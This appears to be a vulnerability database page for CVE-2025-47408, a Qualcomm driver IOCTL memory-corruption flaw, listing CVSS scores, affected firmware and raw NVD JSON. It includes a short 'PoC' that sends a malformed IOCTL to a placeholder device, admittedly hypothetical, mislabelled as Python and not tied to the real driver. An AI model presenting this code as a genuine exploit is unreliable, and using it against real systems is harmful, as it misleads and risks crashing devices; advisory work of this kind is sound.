Security Vulnerability Report
中文
CVE-2025-47408 CVSS 7.8 HIGH

CVE-2025-47408

Published: 2026-05-04 17:16:21
Last Modified: 2026-05-06 18:03:01
Source: [email protected]

Description

Memory corruption when another driver calls an IOCTL with invalid input/output buffer.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:qualcomm:fastconnect_6200_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:qualcomm:fastconnect_6200:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:qualcomm:fastconnect_6900_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:qualcomm:fastconnect_6900:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:qualcomm:fastconnect_7800_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:qualcomm:fastconnect_7800:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:qualcomm:iqx5121_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:qualcomm:iqx5121:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:qualcomm:iqx7181_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:qualcomm:iqx7181:-:*:*:*:*:*:*:* - NOT VULNERABLE
Qualcomm 驱动程序 (具体受影响版本请参考官方安全公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#include <windows.h> #include <stdio.h> // Vulnerable IOCTL Code (Hypothetical) #define VULNERABLE_IOCTL 0x222003 int main() { HANDLE hDevice; DWORD bytesReturned; BOOL result; // Open a handle to the vulnerable device // Replace "\\\\.\\VulnerableQualcommDevice" with actual device name hDevice = CreateFileA("\\\\.\\VulnerableQualcommDevice", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (hDevice == INVALID_HANDLE_VALUE) { printf("Failed to open device. Error: %d\n", GetLastError()); return 1; } printf("Device opened successfully. Sending malicious IOCTL...\n"); // Prepare an invalid buffer address to trigger memory corruption // Using 0x41414141 as a dummy invalid address PVOID invalidBuffer = (PVOID)0x41414141; // Send the IOCTL with the invalid buffer result = DeviceIoControl(hDevice, VULNERABLE_IOCTL, invalidBuffer, // Input Buffer 0x100, // Input Buffer Size invalidBuffer, // Output Buffer 0x100, // Output Buffer Size &bytesReturned, NULL); if (!result) { printf("DeviceIoControl failed. Error: %d\n", GetLastError()); } else { printf("IOCTL returned successfully. System may be unstable.\n"); } CloseHandle(hDevice); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-47408", "sourceIdentifier": "[email protected]", "published": "2026-05-04T17:16:21.257", "lastModified": "2026-05-06T18:03:00.557", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Memory corruption when another driver calls an IOCTL with invalid input/output buffer."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-822"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:qualcomm:fastconnect_6200_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "CDE1CBDE-3D28-463C-B215-AA7DF373EF09"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:qualcomm:fastconnect_6200:-:*:*:*:*:*:*:*", "matchCriteriaId": "66BD3B88-7CF9-482D-A2DD-67F6ACF4CC57"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:qualcomm:fastconnect_6900_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "E670F500-9B71-4BBE-B5DA-221D35803C89"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:qualcomm:fastconnect_6900:-:*:*:*:*:*:*:*", "matchCriteriaId": "9ADEB5C5-B79A-4F45-B7D3-75945B38DB6C"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:qualcomm:fastconnect_7800_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "B3053D68-C5D8-4D47-A4F0-9F3AF2289E1D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:qualcomm:fastconnect_7800:-:*:*:*:*:*:*:*", "matchCriteriaId": "638DBC7F-456F-487D-BED2-2214DFF8BEE2"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:qualcomm:iqx5121_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "499A2520-436C-4B12-849D-98B94088CCDE"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:qualcomm:iqx5121:-:*:*:*:*:*:*:*", "matchCriteriaId": "4C34A825-C928-4F8F-B076-19F8787A3440"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:qualcomm:iqx7181_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "F58C10B5-2BB1-4A8F-AF4B-2EC791C9FBBE"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:qualcomm:iqx7181:-:*:*:*:*:*:*:*", "matchCriteriaId": "9EE22328-BBF8-473C-8F89-58AEF8CC9D75"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:qualcomm:qca0000_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "CC941093-1A7C-47B2-AB3B-05AE4AE2FBE4"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:qualcomm:qca0000:-:*:*:*:*:*:*:*", "matchCriteriaId": "7A2AA834-C17C-4E0E-A510-795818041E47"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:qualcomm:sc8380xp_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "14E3FE58-7F1C-4F5C-B62D-0CF124E14AB2"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:qualcomm:sc8380xp:-:*:*:*:*:*:*:*", "matchCriteriaId": "FFCB0BBA-3F81-4FCA-B3DE-190C46DA50DB"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:qualcomm:sd865_5g_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "72433485-B229-46A6-BCA4-394AA4EEA683"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:qualcomm:sd865_5g:-:*:*:*:*:*:*:*", "matchCriteriaId": "04D40EC4-BF31-4BFD-8D0A-8193F541AF02"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:qualcomm:sm6250_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "FACA2BF1-85D3-447F-A08D-B90330A22550"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:qualcomm:sm6250:-:*:*:*:*:*:*:*", "matchCriteriaId": "C2ABA18D-82C1-4366-B1D7-DED42DD3D5C5"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.